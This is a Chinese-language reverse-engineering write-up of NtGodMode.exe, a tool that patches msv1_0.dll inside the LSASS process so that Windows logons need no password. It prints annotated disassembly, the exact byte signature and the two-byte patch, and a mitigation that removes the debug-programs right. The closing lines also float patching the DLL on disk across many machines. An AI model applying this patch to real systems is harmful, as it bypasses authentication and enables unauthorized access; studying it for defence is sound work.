分析NtGodMode.exe干了什么
by http://tmdnet.nothave.com
NtGodModex.exe http://www.xfocus.net/tools/200804/1272.html
NtGodMode.exe 9.00 KB (9,216 字节) UPX壳,直接用Ollydbg脱壳,过程略
NtGodMode~.exe 120 KB (123,392 字节) 用PE工具查看,delphi写的
00403220 > 55 PUSH EBP
00403221 8BEC MOV EBP,ESP
00403223 B9 0D000000 MOV ECX,0D
00403228 6A 00 PUSH 0
0040322A 6A 00 PUSH 0
0040322C 49 DEC ECX
0040322D ^ 75 F9 JNZ SHORT NtGodMod.00403228
0040322F 51 PUSH ECX
00403230 53 PUSH EBX
00403231 56 PUSH ESI
00403232 57 PUSH EDI
00403233 A1 9C404000 MOV EAX,DWORD PTR DS:[40409C]
00403238 C600 01 MOV BYTE PTR DS:[EAX],1
0040323B B8 C0314000 MOV EAX,NtGodMod.004031C0
00403240 E8 13EEFFFF CALL NtGodMod.00402058 //获取自身进程的句柄(基地址)
00403245 BB 60574000 MOV EBX,NtGodMod.00405760
0040324A 33C0 XOR EAX,EAX
0040324C 55 PUSH EBP
0040324D 68 80384000 PUSH NtGodMod.00403880
00403252 64:FF30 PUSH DWORD PTR FS:[EAX]
00403255 64:8920 MOV DWORD PTR FS:[EAX],ESP
00403258 E8 1BF2FFFF CALL NtGodMod.00402478
0040325D 48 DEC EAX
0040325E 7D 61 JGE SHORT NtGodMod.004032C1 // ->>004032C1
00403260 E8 4FFEFFFF CALL NtGodMod.004030B4
00403265 68 98384000 PUSH NtGodMod.00403898 ; ASCII "Usage: "
0040326A 8D55 E4 LEA EDX,DWORD PTR SS:[EBP-1C]
0040326D 33C0 XOR EAX,EAX
0040326F E8 F8F0FFFF CALL NtGodMod.0040236C
00403274 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
00403277 8D55 E8 LEA EDX,DWORD PTR SS:[EBP-18]
0040327A E8 11F4FFFF CALL NtGodMod.00402690
0040327F FF75 E8 PUSH DWORD PTR SS:[EBP-18]
00403282 68 A8384000 PUSH NtGodMod.004038A8 ; ASCII " ON|OFF"
00403287 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14]
0040328A BA 03000000 MOV EDX,3
0040328F E8 70E9FFFF CALL NtGodMod.00401C04
///////////////////////////////////////////////////////////////////////////////////////////////////
004032C1 A1 8C404000 MOV EAX,DWORD PTR DS:[40408C]
004032C6 E8 61EAFFFF CALL NtGodMod.00401D2C
004032CB 50 PUSH EAX //msv1_0.dll
004032CC E8 BFEEFFFF CALL <JMP.&kernel32.LoadLibraryA> //LoadLibrary("msv1_0.dll")
004032D1 A3 4C574000 MOV DWORD PTR DS:[40574C],EAX //保存msv1_0.dll基地址
004032D6 833D 4C574000 0>CMP DWORD PTR DS:[40574C],0
004032DD 0F84 82050000 JE NtGodMod.00403865
004032E3 33C0 XOR EAX,EAX
004032E5 A3 50574000 MOV DWORD PTR DS:[405750],EAX
004032EA A1 4C574000 MOV EAX,DWORD PTR DS:[40574C]
004032EF 8903 MOV DWORD PTR DS:[EBX],EAX
004032F1 33C0 XOR EAX,EAX
004032F3 55 PUSH EBP
004032F4 68 50334000 PUSH NtGodMod.00403350
004032F9 64:FF30 PUSH DWORD PTR FS:[EAX]
004032FC 64:8920 MOV DWORD PTR FS:[EAX],ESP
004032FF 8B03 MOV EAX,DWORD PTR DS:[EBX] //msv1_0.dll基地址
00403301 8038 8B CMP BYTE PTR DS:[EAX],8B
00403304 75 1C JNZ SHORT NtGodMod.00403322
00403306 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403308 40 INC EAX
00403309 8038 4D CMP BYTE PTR DS:[EAX],4D
0040330C 75 14 JNZ SHORT NtGodMod.00403322
0040330E 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403310 83C0 02 ADD EAX,2
00403313 8038 0C CMP BYTE PTR DS:[EAX],0C
00403316 75 0A JNZ SHORT NtGodMod.00403322
00403318 8B03 MOV EAX,DWORD PTR DS:[EBX]
0040331A 83C0 03 ADD EAX,3
0040331D 8038 49 CMP BYTE PTR DS:[EAX],49 //在msv1_0.dll空间里找8B 4D 0C 49,这个特征值
00403320 74 04 JE SHORT NtGodMod.00403326 //如果找到则继续在后面的空间里找 32 C0
00403322 FF03 INC DWORD PTR DS:[EBX]
00403324 ^ EB D9 JMP SHORT NtGodMod.004032FF
00403326 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403328 8038 32 CMP BYTE PTR DS:[EAX],32
0040332B 75 11 JNZ SHORT NtGodMod.0040333E
0040332D 8B03 MOV EAX,DWORD PTR DS:[EBX]
0040332F 40 INC EAX
00403330 8038 C0 CMP BYTE PTR DS:[EAX],0C0
00403333 75 09 JNZ SHORT NtGodMod.0040333E
00403335 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403337 A3 50574000 MOV DWORD PTR DS:[405750],EAX //保存找的地址[405750]
0040333C EB 04 JMP SHORT NtGodMod.00403342
0040333E FF03 INC DWORD PTR DS:[EBX] //指针加1
00403340 ^ EB E4 JMP SHORT NtGodMod.00403326
00403342 33C0 XOR EAX,EAX
00403344 5A POP EDX
00403345 59 POP ECX
00403346 59 POP ECX
00403347 64:8910 MOV DWORD PTR FS:[EAX],EDX
0040334A 68 57334000 PUSH NtGodMod.00403357
0040334F C3 RETN
00403357 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
0040335C 2B05 4C574000 SUB EAX,DWORD PTR DS:[40574C] //上面找到的地址=msv1_0.dll基地址,得到特征值的偏移
00403362 A3 50574000 MOV DWORD PTR DS:[405750],EAX //offset ->[405750]
00403367 A1 4C574000 MOV EAX,DWORD PTR DS:[40574C]
0040336C 50 PUSH EAX
0040336D E8 E6EDFFFF CALL <JMP.&kernel32.FreeLibrary>
00403372 C605 9C584000 0>MOV BYTE PTR DS:[40589C],0
00403379 C605 91584000 0>MOV BYTE PTR DS:[405891],0
00403380 C605 9D584000 0>MOV BYTE PTR DS:[40589D],0
00403387 E8 28FDFFFF CALL NtGodMod.004030B4 //显示作者信息
0040338C 8D55 DC LEA EDX,DWORD PTR SS:[EBP-24]
0040338F B8 02000000 MOV EAX,2
00403394 E8 D3EFFFFF CALL NtGodMod.0040236C
.
.
.
/////////////////////////////////////////////////////////////////////////////////////////////
//提升自身权限为调试权限
http://tmdnet.nothave.com/tmp/NtGodMode.txt
00402F1C 53 PUSH EBX ; NtGodMod.00405760
00402F1D 83C4 E8 ADD ESP,-18
00402F20 33DB XOR EBX,EBX
00402F22 54 PUSH ESP
00402F23 6A 28 PUSH 28
00402F25 E8 3EF2FFFF CALL <JMP.&kernel32.GetCurrentProcess>
00402F2A 50 PUSH EAX
00402F2B E8 F8F1FFFF CALL <JMP.&advapi32.OpenProcessToken>
00402F30 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
00402F34 50 PUSH EAX
00402F35 68 7C2F4000 PUSH NtGodMod.00402F7C ; ASCII "SeDebugPrivilege"
00402F3A 6A 00 PUSH 0
00402F3C E8 DFF1FFFF CALL <JMP.&advapi32.LookupPrivilegeValueA>
00402F41 85C0 TEST EAX,EAX
00402F43 74 30 JE SHORT NtGodMod.00402F75
00402F45 C74424 08 01000>MOV DWORD PTR SS:[ESP+8],1
00402F4D C74424 14 02000>MOV DWORD PTR SS:[ESP+14],2
00402F55 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]
00402F59 50 PUSH EAX
00402F5A 6A 00 PUSH 0
00402F5C 6A 10 PUSH 10
00402F5E 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00402F62 50 PUSH EAX
00402F63 6A 00 PUSH 0
00402F65 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
00402F69 50 PUSH EAX
00402F6A E8 A9F1FFFF CALL <JMP.&advapi32.AdjustTokenPrivileges>
00402F6F 83F8 01 CMP EAX,1
00402F72 1BDB SBB EBX,EBX
00402F74 43 INC EBX
00402F75 8BC3 MOV EAX,EBX
00402F77 83C4 18 ADD ESP,18
00402F7A 5B POP EBX
00402F7B C3 RETN
///////////////////////////////////////////////////////////////////////////////////////////////
.
. //这段为通过进程名获取PID(LSASS.EXE) 太长 略...
.
///////////////////////////////////////////////////////////////////////////////////////////////
http://tmdnet.nothave.com/tmp/NtGodMode.txt
0040358A 50 PUSH EAX
0040358B 6A 00 PUSH 0
0040358D 68 FF0F1F00 PUSH 1F0FFF
00403592 E8 01ECFFFF CALL <JMP.&kernel32.OpenProcess>//打开%systemroot%\system32\LSASS.EXE进程
00403597 8BF0 MOV ESI,EAX
00403599 85F6 TEST ESI,ESI
0040359B 75 1E JNZ SHORT NtGodMod.004035BB
0040359D A1 98404000 MOV EAX,DWORD PTR DS:[404098]
004035A2 BA 10394000 MOV EDX,NtGodMod.00403910 ; ASCII "Sorry. I can't DO more."
004035A7 E8 78E8FFFF CALL NtGodMod.00401E24
004035AC E8 6FE1FFFF CALL NtGodMod.00401720
004035B1 E8 3EDCFFFF CALL NtGodMod.004011F4
004035B6 E9 AA020000 JMP NtGodMod.00403865
004035BB B8 A0584000 MOV EAX,NtGodMod.004058A0
004035C0 BA 00000100 MOV EDX,10000
004035C5 E8 0EECFFFF CALL NtGodMod.004021D8
004035CA 68 A0584100 PUSH NtGodMod.004158A0
004035CF BA A0584000 MOV EDX,NtGodMod.004058A0
004035D4 B9 00000100 MOV ECX,10000
004035D9 8BC6 MOV EAX,ESI
004035DB E8 A4F8FFFF CALL NtGodMod.00402E84
004035E0 8B3D A0584100 MOV EDI,DWORD PTR DS:[4158A0]
004035E6 4F DEC EDI
004035E7 85FF TEST EDI,EDI
004035E9 0F82 D6000000 JB NtGodMod.004036C5
004035EF 47 INC EDI
004035F0 C705 58574000 0>MOV DWORD PTR DS:[405758],0
004035FA BB A0584000 MOV EBX,NtGodMod.004058A0
004035FF 833B 00 CMP DWORD PTR DS:[EBX],0
00403602 0F84 BD000000 JE NtGodMod.004036C5
00403608 C705 A4584100 C>MOV DWORD PTR DS:[4158A4],0C8
00403612 A1 A4584100 MOV EAX,DWORD PTR DS:[4158A4]
00403617 50 PUSH EAX
00403618 B9 A8584100 MOV ECX,NtGodMod.004158A8
0040361D 8B13 MOV EDX,DWORD PTR DS:[EBX]
0040361F 8BC6 MOV EAX,ESI
00403621 E8 8EF8FFFF CALL NtGodMod.00402EB4
///////////////////////////////////////////////////////////////////////////////////////////////////
http://tmdnet.nothave.com/tmp/NtGodMode.txt
00403732 68 5C574000 PUSH NtGodMod.0040575C
00403737 6A 40 PUSH 40
00403739 6A 02 PUSH 2
0040373B A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403740 50 PUSH EAX
00403741 56 PUSH ESI
00403742 E8 79EAFFFF CALL <JMP.&kernel32.VirtualProtectEx>
00403747 68 98584000 PUSH NtGodMod.00405898
0040374C 6A 02 PUSH 2
0040374E 68 90404000 PUSH NtGodMod.00404090
00403753 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403758 50 PUSH EAX
00403759 56 PUSH ESI
0040375A E8 69EAFFFF CALL <JMP.&kernel32.WriteProcessMemory> //32C0 xor al,al修改为B001 mov al,1
0040375F B0 04 MOV AL,4
00403761 E8 DEEFFFFF CALL NtGodMod.00402744
00403766 A1 98404000 MOV EAX,DWORD PTR DS:[404098]
0040376B BA 70394000 MOV EDX,NtGodMod.00403970 ; ASCII "Open God Mode!"
00403770 E8 AFE6FFFF CALL NtGodMod.00401E24
00403775 E8 A6DFFFFF CALL NtGodMod.00401720
0040377A E8 75DAFFFF CALL NtGodMod.004011F4
0040377F 33C0 XOR EAX,EAX
00403781 E8 BEEFFFFF CALL NtGodMod.00402744
00403786 EB 54 JMP SHORT NtGodMod.004037DC
00403788 68 5C574000 PUSH NtGodMod.0040575C
0040378D 6A 40 PUSH 40
0040378F 6A 02 PUSH 2
00403791 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403796 50 PUSH EAX
00403797 56 PUSH ESI
00403798 E8 23EAFFFF CALL <JMP.&kernel32.VirtualProtectEx>
0040379D 68 98584000 PUSH NtGodMod.00405898
004037A2 6A 02 PUSH 2
004037A4 68 94404000 PUSH NtGodMod.00404094
004037A9 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
004037AE 50 PUSH EAX
004037AF 56 PUSH ESI
004037B0 E8 13EAFFFF CALL <JMP.&kernel32.WriteProcessMemory>
004037B5 B0 07 MOV AL,7
004037B7 E8 88EFFFFF CALL NtGodMod.00402744
004037BC A1 98404000 MOV EAX,DWORD PTR DS:[404098]
004037C1 BA 88394000 MOV EDX,NtGodMod.00403988 ; ASCII "Close God Mode!"
004037C6 E8 59E6FFFF CALL NtGodMod.00401E24
004037CB E8 50DFFFFF CALL NtGodMod.00401720
004037D0 E8 1FDAFFFF CALL NtGodMod.004011F4
004037D5 33C0 XOR EAX,EAX
004037D7 E8 68EFFFFF CALL NtGodMod.00402744
004037DC 6A 00 PUSH 0
004037DE 6A 00 PUSH 0
004037E0 56 PUSH ESI
004037E1 E8 6AE9FFFF CALL <JMP.&kernel32.FlushInstructionCache>
小结
NtGodMode.exe是通过打开LSASS.EXE进程msv1_0.dll模块空间里,然后搜索特征值8B 4D 0C 49之后第1个32 C0
这个32C0汇编码xor al,al,修改为B001对应汇编码mov al,1
为什么mov al,1,以后就不用密码了?有兴趣的同学可以装个虚拟机,调下LSASS.EXE
这个程序在我自己的机器win2k sp4上,不起作用,我跟了一下,主要是搜索的上面的哪个特征值它不是通用的,修改错了地方
xp sp2 xp sp3都起作用。
另外想让自己机器免疫这个东西的话, 其实也很简单控制面板->管理工具->本地安全策略->本地策略->用户权利指派->调试程序
里面有个admin用户,删除了以后,因为这个程序提升自身权限的代码,很老,很差,很弱小,会失效
其实这个东西要这样用,通过编程的方法,关掉系统的文件保护,直接改msv1_0.dll这个PE文件,这样机器不用密码了,然后要是很多机器的话访问共享文件也方便,计算机应该以人为本。
最后说一句delphi写的东西是不行,垃圾太多~!!
http://tmdnet.nothave.com/tmp/NtGodMode.txt